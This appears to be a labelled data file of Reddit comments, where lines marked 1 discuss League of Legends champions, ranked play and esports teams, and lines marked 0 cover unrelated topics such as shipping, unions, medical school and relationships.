1	Excellent argument. I would like to preface by saying that I love TSM (specially Oddbro), but I totally respect CLG and will continue to admire them in terms of their play and personalities (even Chauster cuz he doesn't give two fucks and tells it straight up)   What I would like to say is that, while DB/Chauster may have the upperhand in terms of laning phase knowledge and strictly matchup based play, Chaoxpecial have much better team synergy, which IMO beats out any other quality that a botlane should have in terms of winning.   That being said, Doublelift is clearly the best mechanical AD Carry in NA and Chauster is most likely one of the top if not the top support in NA mechanically and in decision making (Xpecial so good tho mang). But with the recent changes in CLG (The 3 Way ((lulz)) between Dig and Crs) has allowed TSM's bot lane to surpass CLG's in decisions,teamfighting, adjustments, objectives, and everything that enables teams to win. I have a strong inclination though that after Korea CLG.NA will be fucking scary as Hotshot has pointed out in the Travis interview.   And in judging simply who is better PLAYER...that is very very subjective simply due to the team nature of the game. To do that you would have to look at who contributes more to their respective team in terms of winning . If you're going by pure ability to fucking hardcore carry the shit out of your team potential through plays mang then I would say Doublelift beats out Chaox handily. HOWEVER, you have to consider the fact that Chaox makes the picks and bans for TSM (albeit with heavy team input but he usually is the deciding factor) along with being one of the most consistent/ if not the most consistent AD Carry in the game.   SO...what you have here is the Mechanics vs Decision Making dilemma.  IMO DB has a better chance of outplaying Chaox, yet at the end of the day (as of now) it won't matter because the chance of Chaox being where he needs to be.   EDIT:
0	Maybe all those people drove past you because they can't change a tire such as yourself.
1	Morde is just a bad champion. I would rather have any other AP champion. Morde is forced to push, just by the way his abilities work. Accidentally or otherwise, he will inadvertently push his lane, making him very vulnerable to ganks. He can farm up a storm, but he will leave himself so open only a foolish team would let him free farm without ganking. He is also forced to use his abilities on minion waves just because without his shield, and considering his abilities take his HP, he will be outharassed by many other champions with just his auto-attack.   He also has no CC. The lack of CC or slow, or any escape mechanism makes him a very bad AP champion compared to other AP champions. The only way to do well with him, if the enemy team is decent, is for him to ghost the enemy's AD carry, and use it to destroy the opponents. However, a QSS or cleanse grab will easily cancel this, and make Morde a spambot, albeit a tanky spambot.   Look at your CS as well. You notice, that Morde needs an incredible farm to get good enough items to pose a serious threat to the enemy. Otherwise, he will be weak and ineffective. But, as mentioned, when he farms, he forces himself to push and push, and open to a lot of ganks. Even worse, though, he will need to farm for 20-30 minutes for the start of the game to hold his own mid-late game. Other champions that require such a farm, like Nasus or Irelia, can hold their own without a huge farm, and slowly farm up through the game. Plus, both of these champions have slows/stuns.
1	Well I am really sad now...   Dignitas completely deserved that win for their performance in the second two games, Crumbz's Lee Sin in particular was amazing. As for Curse, I thought they made a few bad decisions in this series which cost them their chance at worlds but otherwise they played very well. I really hope that they can keep their spirits up for the game vs CLG tomorrow.
0	I never ship with the USPS anymore after my fiasco with them. They wound up completely trashing my custom built computer, which I had insured. When I tried to file the claim they kept giving me the runaround, saying I needed proof of its value and that bank statements weren't sufficient. Once I got proof they begrudgingly sent in my claim, which was promptly "lost" and the notification sent to me past the 30 (or 60, I forget) day claim limit.
0	Indeed, most people get Post Traumatic Stress Disorder after having experienced a Traumatic event which later leads to stress and mental fatigue.
1	There is something to say about the suggestions that you make (like going QEQ or 3rd item BT on Caitlyn - from now on referred as 3BT): while it is most certainly true that these two paths have higher winrate than others, you  cannot infer causality .   What this means is that you can't tell whether it is going QEQ that makes you win more, or the fact that you get an advantage in the first two levels that allows you in consequence to level Q for more damage. The same goes for 3BT over 3LW -- you most likely build it when you already have an advantage (therefore more likely to win in the first place), while you build LW in all other situations (even or behind).   There is a fine line within causality inference, which can very rarely be robustly calculated by statistics. This is where common sense and economic modeling step in. A better way to express the statistic would be: "3BT is the preferred path when you already have an advantage, 3LW when you are going even, X when you are behind". An even better way to look at this for confirmation of the logical inference would be to check all the 3BT games and see how many times the Caitlyn had an advantage before building it.
1	That MF is retarded. She could have kited and put down her E in every instance. There was no reason to ult because the damage is complete shit at this stage.
0	Union employee here - while unions can have their problems sometimes, I would think if I were in this situation this would be something handled through the grievance procedure.  If this was attempted and has failed, then your union has failed you.  Trust me, I know about particular people in unions being useless or only out for themselves and it's demoralizing when those people get their way.   In our system leave is granted on a seniority basis, within each store and management class - i.e. one manager can have off but not two at the same time, and one non-management employee can have off but not two (unless a store has a metric fuckton of employees like some of the megastores.)  But I believe it's more done in our system that two people asking for leave around the same time is when the seniority kicks in...if someone in say December puts in for time at some point in the summer, and then someone with more time would put in for that same time in April, the person in April would be denied even if they had more time because plans have already been made, travel paid for, etc, etc. by the person who put in in December.  Earliness of the request is as important as seniority.   ...but I guess I'm lucky that the one person superior to me in the store never takes proper vacation and uses his 25 days to give himself an additional 25 Saturdays off each year so we never conflict anyway.
0	Ok, whether or not homosexuality is forbidden in Christianity/Catholicism is a little fuzzy because of individual interpretations of the Biblical passages involved.  I'll let you do your own research there.  It's a was little more clear-cut in Catholicism, but that's only because the Pope condemns it, and what the Pope says is what goes in the Catholic church.  However, the current Pope's stance has been a little more understanding than previous ones, so things may change eventually.  Still, unconditional love and forgiveness, especially for a family member, is SUPPOSED to be a large part of the Christian faith.  If you are following scripture, than even if the parents did not condone their child's lifestyle, disowning him could easily be interpreted as wrong and sinful.   Also, disclaimer here, I'm an agnostic who believes there is absolutely nothing wrong with homosexuality.  This is just an explanation of how the priest may have interpreted the situation.
1	I main two positions, Support and Mid; and I play quite specifically one  distinct  type of Champion.   My go to Mid is Ziggs, mostly because of his amazing harass and ability to annoy enemy laners; his farming is superb and can rack up impressive CS even when he's being pushed out of lane. What sticks out with Ziggs to me is his great team fight presence and AOE, but more specifically his disengage.   For support I use Lulu, I highly enjoy her harass and extremely potent disengage and engage prowess.   Now here is the trend between all of the champs I like to play. I really enjoy crowd control, and I shape my play style around it. I play by annoying the enemy laner to the extent they try to kill me, and they can't.   Now here is my question: I suck at ADC, and it's because of my play style. What is an ADC that fits my style?
1	i can tell that this post will get downvoted into oblivion because of """"negativity"""", since most people can't handle the truth and/or aren't very intelligent, but i just had to write it)   seriously? i can't imagine a MMORPG with 4 spells/buttons to press. can some1 clarify to me how will i be playing this? should i do quests to gain my levels (killing mobs, bosses and stuff like that)? what if i pick soraka, will i need 10 times longer to get max level then? what happens on the maximum level? do i grind gear, do i do pvp/arenas (with 4 buttons lol)? just another poorly thought out idea that will never get implemented. no offense, but try to think about some things before suggesting. also, take into consideration that in a MMORPG you won't be playing on a lane with minions and with champion picks and stuff - can you even imagine pvp there? can you imagine those 1v1's like soraka vs taric hitting each other endlessly? 80% of game mechanics are already broken and the game wasn't even announced. what do we get? a colossal disappointment.   what if riot decides to add more spells to each champion? who's gonna do the balancing stuff then? see that riot can't even properly balance the current game with just 4 spells.
1	For those who don't get it...     "huehuehue" is how Portuguese-speaking people type out their laughter. It's the Portuguese version of "hahaha".     What's the main (possibly only?) Portuguese-speaking country on this side of the Atlantic? Brazil.     What hero are Brazilians notorious for using? Mordekaiser.
1	Won't this change the metagame to something like WoW? Certain roles will get instant queues while others take ages. People will be forced to focus on one role, maybe one they don't even enjoy, because it will be more effective for them to be able to play that one role exceptionally well rather than having a basic understanding of every role.   I'm not excited for this at all. I feel like this system shouldn't be included in ranked or should have an option to turn it off for both you and the enemy team. I don't want to queue up as "fill" and go against a guy that has 2k + games as top lane when I've got a measly 200 or so.
0	Also, the doe can leave the fawn for an extended period of time, or so you might think.   A friend of mine had a doe leave her fawn in his backyard for just over a month, he knew not to worry about it. His backyard ends at a cornfield, and the deer apparently feel safe in his yard as they bring the husks of corn into his yard to eat.   About three weeks in he had thought something had happened to the doe. One night, my friend saw the doe return to the fawn only to leave by morning without the fawn. After about five weeks the doe finally came to take the fawn with her.
1	Your LP gains and losses in ranked are determined by your MMR compared to what MMR is expected for someone in your tier/division.   EFT = Expected MMR for your tier/division   MMR < EFT --> LP gains < LP losses. The system thinks you should be in a lower division/tier.   MMR = EFT --> LP gains ~= LP losses. The system thinks you are roughly where you belong.   MMR > EFT --> LP gains > LP losses. The system thinks you should be in a higher division/tier.   Furthermore, in division 1 of any tier LP gains/losses are also affected by clamping. Clamping stunts your LP gains/losses. Clamping gets more severe the closer you get to your promotion. It is possible to gain +0 LP for a win if you are at ~99 LP and your MMR is insufficient for the next tier. For more information on clamping please read [this]( post.   Additionally, your LP gains and losses are also affected by the average MMR of your team compared to the average MMR of the enemy team.   For more information about the league system read the [Season 3 FAQ](   For more information about MMR read [this](
0	Consider that your experiences might not be universal or even common.   The girl you've fucked is not the same as every other girl when it comes to placement of orifices and sensitivity of same.   Your dick is not the same as every other dick when it comes to tactile sensitivity and ability to distinguish orifices from one another.   Especially when things get hot and heavy and intense, or there's lots of lube involved and everything is slippery, or you're drunk, or in the shower, or whatever, it's remarkably easy for things to slip in the wrong place, and the initial thrust can happen too fast for the woman to react by clenching.
1	People are more likely to report a bad experience than a good one. It would be extremely unlikely, if not altogether impossible, to find a significant enough group of people who not only felt like they won because of a feeder and not their own merit, but felt like it was enough of an accomplishment that they needed to post it here, in addition to which you would have to find a group of people in this community who responded positively to that kind of attitude.   The reason you don't see posts like that isn't because the situation doesn't exist, but because the situation isn't something that is ever going to be commented on or seen on the front page, if it's ever even posted in the first place.
0	Post secondary is so much easier when it comes to managing your social life. There are so many people in highschool that are just so much different than you are. Some are even intolerant to your differences which is beyond me and blows my mind.
1	Because DotA is a much older game with far more lessons learned in development.     Because DotA's system for balance revolves around items, counter picks, and synergy picks.     Because DotA's items fill niches and so many items have actives as powerful if not more powerful than most individual abilities. There's no core, calculated build for roles in DotA (compared to LoL's trend of having "the build path" for AD carries that has max-dps calculated in, or S1 always rushing Zhonya's). Items create answers for strategies in DotA.     Because DotA heroes aren't given everything. Most heroes have 4 skills with no side effects (shut up about Oracle, I know that shit is crazy). This leaves a lot of holes in their kits and leaves actual weaknesses.       Edit 5. Because DotA's map is amazing. It leaves so much more room for strategic decisions and variations than League's.   Many of Riot's champions have all these added bonuses and sides to their abilities. Like Zed's W giving bonus AD, Yasuo's W making him generate his shield faster, Jinx gaining range on her AoE attack, etc. These bonuses can remove the weaknesses in a champion's kit. Popularity in League often feels like "use the champions that have the most, because they just get to do more."
0	Why has this got -92 down votes? People are suggesting he might be lying or down voting for boasting or are annoyed because this post might be cringe. Trust redditors to find out a fellow redditor is gonna get laid and instantly declare bullshit or downvote him because let's face it, you guys think it's too unrealistic to be true, reddit does not and never will get any of you laid.
0	You must be from Europe. Most people from the United States do not have, nor do they need, a passport. If Americans want to visit some place 2000 miles away, all they need is a plane ticket or a few days for the drive. If Europeans want to visit some place 1000 miles away, they probably need a passport, and at 2000 they will need one, unless they're Russian and want to visit Siberia.
0	To clarify - I understand the rationale behind wanting to make more money.  We all do, greed is a natural emotion.  It's when you think you actually  need  that money to live or function in society I have a problem with.  Money doesn't just appear from some vacuum - you take it from other people.  Growth on the other hand, and using what money you have  efficiently , can be overall positive.  With our current societally-endemic issues with wealth inequality, everyone needs to be more smart less stubborn about their impact.   If you choose to have a second house with a pool or ten cars before feeding a couple hundred people or creating more jobs, then yes, I'm afraid I'm going to judge you for your damaging narcissism.
1	It's definitely one advantage of being in a more structured environment. Both Gambit and TSM suffer from having to be entirely self-motivated, whereas I'm sure AZB didn't even have the option to take a month and a half break. If you've seen the office where TPA plays, it's just a normal place of work with other people around who are doing their jobs and TPA come in, put in the practice and go home every day. Gaming houses are better than nothing, and Gambit don't even have that.
1	I was placed in plat 4, and got teams that fed to the point where I wish there was a surrender button at 15 minutes until I dropped to plat 5. So this caused my MMR to become shit. Now, I can't queue without getting teams that are going to lose no matter what unless i play something somewhat broken like teemo or fizz.
1	It's a squiggly line, colorblind people can't see squiggly lines.   In all seriousness, though, I don't know why they can't tell the difference.   I feel like the modified textures are significantly more obvious than any contrast (or lack thereof) in colors.  The two most common colorblindness types are red/green and blue/green, and both of those would still be able to tell the difference in colors, although it may not be quite as obvious.  The giant jagged lines at the edge of it are also fairly visible, even while being a somewhat similar color to parts of the map it may be on top of.
1	I normally take suggestions given by students who have a certain question.   Someone asked about Feral Flare today and I went over that, and also showed some clips of it in use from the high elo Yi player.   All of my lessons normally have a lot of things involved. With the Feral Flare lesson I also talked about the mechanics of dodging turret shots with Q, the importance of not initiating with Q if you plan to dive them after, ect.   Sometimes i'll analyze an LCS game and explain 2v1 swaps, ect. It helps them understand dragon rotations and when to do Baaron mainly for their own games.   If people don't give me suggestions I normally take mechanical plays from Reddit and analyze them. We have some "Chill" days where I just show a relaxed video on not flaming your team mates, and how positivity benefits you in a game.
0	I am white, my kids are Samoan, Mexican, Chinese and White.   The looks are priceless.   { Edit }   To Clarify, these are not different children, this is the mixture of blood my kids have.  They each have Samoan, Mexican, Chinese and White, what white I am not sure, I think Danish.
0	For Latin, I would drop the  Ego . It's understood with the verb. Unless you want some emphasis that its you coming from the future. And I would go with the perfect tense of  venio, venire  which is  Veni . It would mean more "I have come." And instead of  de  I would go with  ex  since you're coming out of the future. Also the noun of future is always plural so you'd want  futuris  instead.
1	On the topic of smurf games - both a friend and I are around 1400. We often duo-queue on smurfs because we want to practice last hitting under extreme pressure (nothing like constant harass/pushing!) or try new champions, etc. We'll regularly go 13/0 or so in these games, but unfortunately - "the amount of positive impact you make on the game doesn't translate well enough to a higher win ratio."   For every "troll" or bad player that's on the other team, there will be one on yours - and all it takes is one or two bad players to destroy any chance of winning a game. What makes more of a difference is how bad each person's worst player(s) are, and how much the team is able to come together and help them. You can look at it like this - if someone on the enemy team is 800 and the rest 950-1000, then you might have 2 people on your team who are 900 to even out the odds. Which, by sheer fact of having one person that "bad" decreases their chances of winning significantly - all it takes is one fed pubstomp champ to ruin a game (Tryndamere anyone?)   Additionally, a fact people often forget - THE GAMES ARE NOT EVEN. You are NEVER going up against a team with a 50/50 shot of winning. There was a Riot post about this -
0	Uncle started with snap on about 20 years ago now he has a 7 figure salary. Dedication and people skills with a bit of good luck. He always told me If you try hard and make your own opportunities your job will work for you.
0	A good guy trucker almost killed my wife. I was on the shoulder in a traffic jam trying to get her to the hospital and was boxed it by truckers not letting me pass. So without an ambulance she would have died. It almost didn't get through either.
0	I would like to echo a lot of what has been said in regards to your qualifications as a med school applicant.   You do look immaculate on paper: excellent GPA, tons of volunteer hours, research, masters degree, work experience. It's obvious you will make it through medical school and will have no trouble getting the degree. Medical school is rigorous, the curriculum is overwhelming, the fact that you have done everything you did shows them you will make it, otherwise why bother spending the time to interview you. Hell, you have been interviewed twice, they know you can hack it. But guess what? So can everyone else that is being interviewed. They don't interview people who won't make it.   Despite what you think an excellent GPA, loads of research, volunteer work, shadowing, doesn't necessarily show the interviewers and committee whether you would make a good physician. Again there are tons of applicants who look exactly like you on paper. They want to get to know you, the person.   One of the questions I was asked on the interview trail was "Why?" Why go through all the trouble, why do you want to be a doctor, why do you want to sacrifice another 8-12 yrs of your life to formal education and training? There has to be a reason other than "I want" or "my mom and/or dad is a doctor" or " I like science and the human body is amazing". I don't want to assume this is the case with you, I'm sure you have a very good reason, otherwise why bother and keep trying to get into med school? But the thing is, the interviewers don't know that. You need to tell them why and demonstrate why this is so important to you.   If you are able to demonstrate why you want to be a physician, another thing they will want to know is what makes you different from the other applicants. As a physician the majority of patients you will likely care for are impoverished people with real life problems. You are treating the veritable Everyman. How do you relate to that? What hobbies do you have outside medicine and science, what jobs have you held, do you like sports, do you play an instrument, are you an artist, woodworking, we're you a plumber in a previous life? I found that a great number of my classmates in med school were philosophy majors, music majors, teachers. Truly a diversity in personalities and multidimensional lives. If your whole life has been dedicated to the idea of looking like the best candidate possible for medical school, then you end up neglecting what makes a person a doctor: you aren't treating disease, you are treating a person. If you are truly as one dimensional as your post makes you sound (I really doubt you are), then maybe you should rethink your career choice and pursue a PhD in biomedical sciences.   Another question I was asked multiple times both during the med school and residency interviews is what are my backup plans? Just because you interview doesn't mean you are getting in, as you have realized by now. No one is entitled a position anywhere in life, and this includes medical school. You have to think, what if all this doesn't work out? What will I do instead? This says as much about your desire to become a physician as it does about your general character. Being able to adapt and overcome adversity is important.   Lastly I think it's important to touch on something else that has been repeated throughout this thread. You have to be personable, you have to know how to talk with people, you have to be able to work well in a team. If you come off as arrogant, socially awkward, or overly competitive, that may turn off some people. You are going to be in close quarters academically and while working with a small group of people for at least the next four years. You have to be able to play well with others. Secondly, as a physician you will be caring for people, and if you have no people skills the rest of your life will be extremely difficult. They cliche is that medicine is as much an art as it is a science. This is becoming even more true as there is a customer service aspect to practicing  medicine. You will fail as a physician if you lose all your patients due to poor bedside manner.   I don't mean to call you out or assume that you suck as a person and that's why you didn't make the cut the first two times around. But as someone else pointed out your post is misleading in that it makes it seems as though it is I fathomable that you didn't get in with your qualifications. Truth be told everything I said may play a part in the admission process, but unless you are on the admissions committee there is no real way to tell what they want from an applicant.
1	This might be true, but it doesn't change the fact that it is a horrible experience for new players.   So she spends her first dozen games losing to high-tier smurfs, her MMR lowers.  Then she spends a dozen games losing to Mid-Tier smurfs (who lose to gold+ smurfs, but can still stomp on a newb).  And so on down the MMR ladder.   This is also disrupted by the fact that every game there is a 50% change the smurf is on YOUR SIDE.  So the losses might be mitigated as you are carried-- but being carried is just as boring and uneducational as being curb stomped.   What's worse, the smurfs on YOUR team yell at you for doing things wrong -- not buying right items, not leashing properly, not winning your lane... They are WAY more toxic than typical beginners.   The end result is one of the worst new-player experiences I've seen in any rated, competative game, ever.   I eventually advised her to just skip solo queue SR entirely and play dominion and bot games until closer to level 20.  This way she learns to teamfight and watch the mini-map, and can practice last hitting vs bots without all the flaming, raging nonsense.
0	This exact same thing just happened in my campus conservative publication. White privilege is NOT a personal, individualized thing. Yes, many white people have experienced personal hardship. I, as a white male, have experienced hardship. But that doesn't mean that I am not privileged.   I personally have experienced economic troubles, as my parents' attitudes toward finance were carefree at best, downright irresponsible at worst. I have not eaten meals so that I could ensure my parents had money to pay the bills. I worked from the time I was 12 (I am currently 20) in order to buy my own clothes, so that my parents didn't have to. I worked my ass off in elementary/middle/high school to earn my way into an Ivy League school.   As a white male, I am less likely to be arrested/go to jail for marijuana use. I am more likely to graduate college. I am more likely to achieve a higher socioeconomic status than my parents. I am more accepted into that socioeconomic status. I am more likely to be elected to any national political office. I am not discriminated against based on my name. People don't leave my side of the street as I walk by. That Ivy League acceptance came with a scholarship from an alumni class that has only given scholarships to white students (not sure if intentional or not, but I doubt it). My network of people has been gained predominately because I am a man and not a women.   Everyone in this world will suffer hardship, from the person who was raised on the silver spoon to the lowest of the low. But, culturally, certain groups will inherently have more advantages in society and, as such, those GROUPS, not individuals, have "privilege."
1	His AD carrying might be bad though because of his low (comparatively) range of 475.  If you got basic AD Carry build, but with manamune and hurricane first, you could probably do really well.  The problem is getting there when other people have a better early game and have more range for harassing.  If you go top, there will be some champs that stomp you, and others you can stomp.  I'm not sure how Thresh would do mid, but don't think it would generally be very viable.  I think top would be best, or bot if you had a really good support, and the other person didn't pick urgot or some other earlygame lane bully.   I've never personally played as Thresh, but I think he could potentially be a really good AD carry if you could get through the laning phase.  He initially has craptastic armor and magic resist, but can get higher resistances once he gets lots of souls, so he can potentially get a lot of extra damage and tankiness lategame.  I feel that unless you have an unconventional support (such as pantheon, shaco etc.) that can put a lot of pressure on the other person early on without items, you probably will not be able to come out ahead of the opposing ad carry, and will likely be behind for a while.  You also need to get up close to the dying minions, and the other people will likely harass you when you go for a soul often enough that you will not be able to get all souls and still lane well.
0	When my step-kid doesn't want the rest of her dinner (usually the veggies: because she's "full of this food"). I eat my ice cream or whatever other dessert in front of her. I ate my dinner and I'm not going to deprive myself because you didn't eat yours. This one took a little bit to smooth over with my SO, the first time I did it - he looked at me in disbelief.
0	Your are correct. I didn't make my point clear as a separate point from the item being removed from your report when I meant dealing with collection agencies who are trying to collect past the statue of limitations. The actual item on the report is another issue and I should have made that clear.   Many companies will buy old debt for pennies on the dollar in hopes of getting people to agree to a payment plan, etc, and many times they do not have any teeth (other than tricks and intimidation) to collect.
1	If not in Ranked, then at least try to do something outside your comfort zone in Normal games. I tend to play super super passive and farm, especially when I'm solo top. One night, I decided I had enough of Teemo's shit, so I just killed him. Again and again. I had no idea I could. Sometimes I don't even try to fight until one of my friends in Skype says "Hey Enigmers, you can definitely just dive that dude."
1	They've never done that, it's just that they are essentially recreating the lore so that the Institute of War never existed.
0	When I first was comfortable driving stick on the road (5 speed 1996 Ford Contour) anytime I was at a light on a hill, and the person behind me was really close, I would stick my hand out my sun roof signaling the driver behind me to back up. I would do pretty much anything a motorist could do to inform the driver behind me that he was too close.   One time that I actually got hit was because of a steep hill pretty much on a 35 degree. Only scuffed up my bumper a bit but the driver and I got out and he was angry that I allowed his car to hit me. I told him that I drove a stick and he apologized. He gave me $50 to buffer the scuff in my bumper (and not involve insurance). Also he taught me to try to use the e-brake in lieu of the foot brake when I am going, so I can have better control of my car.   Eight years later today, I would say that I do not have this problem anymore, but still it is courtesy to never be up someones ass while driving.
1	She is intended as an AP assassin, yet her kit is outclasses by champions similar to her (Katarina and especially Akali).   Her laning phase is slightly stronger than her competition, but her level 6 power spike is much less substantial than when Akali or Katarina gain access to their ultimates.   Her kit and the items available to her also complicate where exactly she fits best in the current meta. She would lose against the classic top lane bruisers since being AP implies an item reliance that takes time and farm to acquire, so Jax, Shyv, Renekton and Co. would wipe the floor with her laning phase. Her jungle build path is still indeterminate, since SotSW frankly sucks to much to ever consider and Feral Flare, while granting Attack Speed that would improve her farming capabilities, gives her no stats with which to scale off of. Plus, Vi, Xin Xhao, Master Yi, Nocturne, they would absolutely wreck her in the early game. Mid Lane would see her getting out poked by Lulu, Karma, Orianna and Syndra, all-in'ed by LeBlanc, or out traded by her superior assassin clones (Katarina/Akali).   She needs to be tank to survive in team fights, but she also needs to be able to deal damage to have any real impact in them. Champions in her position typically have built 1-2 big ticket items by the time teamfighting rolls around, so what do you build? Zhonya's for the invuln? RoA for the late game stats? Abyssal for the 1v1 potential? Lich Bane for burst? DFG for making picks? There are too many things Diana needs to be effective, and the game should be over by the time she is able to get even most of them.   Finally, she is too high skillcap for too little a reward. You need to land your moonlight debuff on your intended target before you can hope of burning them down. Why go through the hassle when Akali allows you to jump to any target you want 3 times with no prerequisite? Or Katarina's Shunpo resets on Kill/Assist and can target allies as well? And both of these champions have a higher damage output than Diana currently does (I say it that way because, on release, Diana's damage was very impressive. I actually enjoyed her time in the spotlight, but Riot Olaf'd her and she hasn't recovered).
0	Why do you wear seatbelts in a car, but not on a bus?](/   Welcome to /r/askengineers boys and gals. Enjoy the ride.   the
0	Hey, you mind coming over and helping me paint my new apartment?"   "Uhh, surrrre."  Fuck, really? You really gotta learn to say no dude. Stop being a pushover.   *Goes over, helps paint apartment*   "Thank you sooo much. That would've taken me forever!"   No, it would've taken you the same amount of time, damnit.   "Not a problem! Glad I could help."   "Anything I could do to return the favor?"   Yeah, I can think of a few things   "Uh, nah. A job well done is a reward in itself."   "You, uh, maybe want like, a blowjob?"   "Are you...are you serious?"   "Yeah, we're both single, you're cute, and I know you're not the clingy type. Just foolin' around, getting our needs met, you know?"   "Well, uh, that'd be cool, yeah."   And we've been fuck buddies ever since.
1	If you play SoloQ with randoms the game is not only about your personal skill, it is about how well you can work in a team with strangers and how deeply you want to win this. If you rage quickly after 1 or 2 deaths you wont stand a chance winning the game. The game is a lot about he players mood. If they want to win and don't flame and have some good team moral you are likely to win the game. If one is flaming all day your moral is going down and everyone does not play at its best or doesn't even try anymore. People tend to concentrate more on flaming then on playing, once it started.   Another point is that a lot of people dont see that a game isn't lost yet. They see a fed Darius or Jax or Orianna or whatever you fed with 1 or 2 kills and the remember last time that hero was fed he stomped the shit out of them. They think this will happen again and don't want to waste time anymore. They are so focused on the mistakes everyone else  or one person does that they dont see that the game might be winable.   If top is struggeling give him some help. Ward for him or stuff like that. Maybe bot is winning hard in cs, even there was no kill. I had a game where I was bot lane, winning with over 100 cs advantage but died 2 times due to well executed gangs and me not observing the map enough. My team started to flame me and did not realized that the enemy ad was already out of the game. He had no items and less gold then our support.   Most less skilled player only see the skills, because the CS aren't shown in big numbers on the screen. They have to press tab and search for it. A kill or a death is shown to everyone with a visual impact.   Sometime people just dont have the skill to realize that they are actually winning or did not lost completly and a comeback is possible. They will rage then and blame other people. You can prevent this with raising the team moral. Saying "Wp dude" if someone did a kill even if he played horrible and still plays horrible. You have to say "we are winning this hard guys. just stay calm" and stuff like that. You need to raise the moral and you might be able to win. Execute some good teamfights, grab people offguard do tower and dragon. Normally a kill or two can help people to realize that the game is not lost. And pay attention to the streaks you might end. This is so much gold many of people dont care about. If you kill someone who has a large streak you might get 1k out of this with kill gold + assist.   You have to make sure the moral is raising and that everyone tries to win. Don't point out mistakes. It's normally considerd as flame. Sad but true :/   People tend to flame and rage if they lose their lane. All they see is their lane and they are pissed that they lost due to their poor play or whatever the reason was. You need to help those guys to get back into the game with a positive mood.
1	I posted this in another thread     This is how I feel about TSM.   Chaox was the only one who ever really stands/stood up to Reginald. Reginald probably doesn't like that and maybe fears Chaox exposes some bad plays or whatever (maybe you can compare it to the Saint - Hotshot situation). Regi has it in his mind to replace Chaox long before he actually does it.   MLG Dallas showed that Chaox being late all the time was a problem. But not a problem that can't be fixed (Chaox even said this). Chaox got benched, Wildturlte played well. Now this was the opportunity for Reginald to talk to his team about replacing Chaox. And since no one really ever stands up to Regi, they all agree.   TSM as a whole said before that they would never kick anyone because of their performance, yet when Regi asks OddOne and Dyrus to make a decision, they make the decision based on HOW Chaox and Wildturle play. Wildturtle is doing good, but Chaox would do good too in my opinion. They just play a different style and for some reason the want Wildturtle's aggressive style more.   This is just my opinion and it's pure speculation. I have absolutely no evidence (other than maybe human knowledge) to back this up.
1	So I'll try to give a bit more of a nuanced answer. There are generally two types of GA takers: squishies and bruisers.   For squishies (AD/AP carry): because of your damage output and your relative lack of survivability, you get targeted first in teamfights. Often times, the enemy team will blow all their initiation and burst on you in order to remove you from the fight; this puts them at a strategic disadvantage, but since they're now up 5v4, it's a worthwhile trade. However, if you have GA, your team can use the respawn time to counterengage, and fight 5v5 with your team having the engage advantage.   For bruisers: Oftentimes, you're doing what's described above; jumping in to kill one of the high priority targets. If you die yourself in the process, the fight is still even (4v4). Chances are the person you killed would have done more than you, so it's a good trade, but to make really sure, being able to respawn immediately gives your team a strong advantage.
0	yeah, i think everyone quit... after no fap november, december, and january, it's gotten old. hopefully we can let the 'month of no masturbation' thing end now.   it's like that classic example of alcoholism. if you say 'i can quit any time i want', do so, and the instantly go back to the bottle, you're not really proving anything.
1	You couldn't be further from the truth. I was at both IEM 2014 and All Stars 2014 and boo'ing of KT Bullets was minor (I didn't actually hear it when I was there and found out some people boo'd from reddit). On top of that it was in the heat of the moment since Gambit was huge crowd favourite, they were losing hard that game and managed to get, what seemed to be, impossible comeback just to get backdoored (which was brilliant move from KT's side btw).   On the other hand, French crowd was very calm and quite compared to IEM crowd (again, talking from perspective of a person who was there live at both events). Lots of people around me were playing on their phones or hand-held consoles and the only times they were cheering was when teams made  really  good plays or when they were shown on the huge screen.   They boo'd C9 HARD, both before, and especially after the lost game vs Fnatic and they also boo'd them when they were coming out to play vs SKT. Non of that happened in IEM.   Don't get me wrong, event is great so far, but compared to IEM I have to say there's noticable difference in energy levels and crowd engagement. I don't know if on stream sounds more pumped during All Stars, but it might have something to do with placement of microphones.
0	I love spending time with my girlfriend.   I also enjoy my personal time alone. Sometimes the two happen at the same time, other times I have to kick her out so she gets girl time and I get me time.
1	It's not about the champion, it's about the player. Everything in this game is about the person playing. Sure, it's a given that some champs have skills that do well versus others, but it lies with personal ability to cope well with that.
1	ok, you want an explanation. here is a wall of text. a huge wall of text with some maths and horrible formatting. i hope you're ready.   with infinity as your only crit-chance item you would have 25% crit, thus 18.75% cdr on the passive, which makes it a 16.25 sec cd.   using a low crit, high sustain build (e.g. IE -> botrk -> LW -> BT), using no runes or masterys, at lvl 18, ashe has 1.39 atkspd. meaning, she will get out 2.79 atacks in a 2 second time window. this means that every third attack will crit. so to get out all 4 stacks she needs 7.19 seconds. in between there are also 6 autohits that might crit or not.   with the given build, ashe has 332.6 AD (again without runes/masterys). on a 153.84 armor target (i use this cause its easier to calculate. after armor pen, there is 100 true armor left, which is a dmg reduction of 50%), she deals 3034.3 dmg. This does ignore the passive and active of botrk.   now i'll compare this with a ashe now. the first aa will be a standard crit, rest is aa's with critchance included. no runes or masterys, 153.84 armor target, 7.19 seconds of time.   build is : IE, BT, LW, statikk   with statikk giving the same atkspd as botrk, she will get out 10 aa's as well. the first one being a crit and activating statikk, the last one activating statikk. i will assume that the dmg of statikk will also be reduced by 50% through MR.   AD value is 307.6. 2 statikk procs (of which one is crit and one is 45% a crit) deal a total of 208.75 dmg, the first crit deals 384.5, all together it deals 2910.78 dmg   so there is a gap in dmg (towards the new ashe) without even thinking about the botrk passive and active. ashe is the queen of kiting, and with botrk getting close to her is living hell. so, she'll stay in a more safe spot, while dealing more dmg.   side note, i did not really calculate the botrk dmg, but just from a quick thought, while attacking a 3k hp target, theres additional dmg of around 350-400, which gets added to the first number, but not the second.   edit:
1	who cares man? I have had like 3 or 4 different reddit accounts over the past few years, and post in a lot of the major subs, and on each account my highest rated comment is always some stupid snarky comment that took no thought, or a post about how I got a BJ from some girl I used to date. I got over 2k comment karma from a story on this account about my room mate banging a 16 year old and how she tried to blackmail him.   the reason your well thought out comments don't get a lot of karma is because nobody cared about it, or it was buried too far, or it was
1	True.  I just wanted to get that out of my head, and writing it down turned out longer than I really expected.  People can just skip to the last paragraph, or read the
1	There is disrespect and there is locking like a fucking fool.   Disrespect requires you to read into your enemies plays and react to them accordingly. It may it's like being able to win 10 turns ago like 3 times in chess.   Or locking yourself in an animation while playing a fighting game. Know they will choke their combo.   In League you have a fucking team counting on you to play at least decently. Having fun shouldn't make you look like an asshole to the enemy and your team.
1	the added safety and better resolution in case something goes wrong on your pc makes up for 10ms delay that you will not notice. 40 ms delay is a lot to connect to a local isp pop, that is connecting to an isp 4800 miles away, you are doing something wrong then
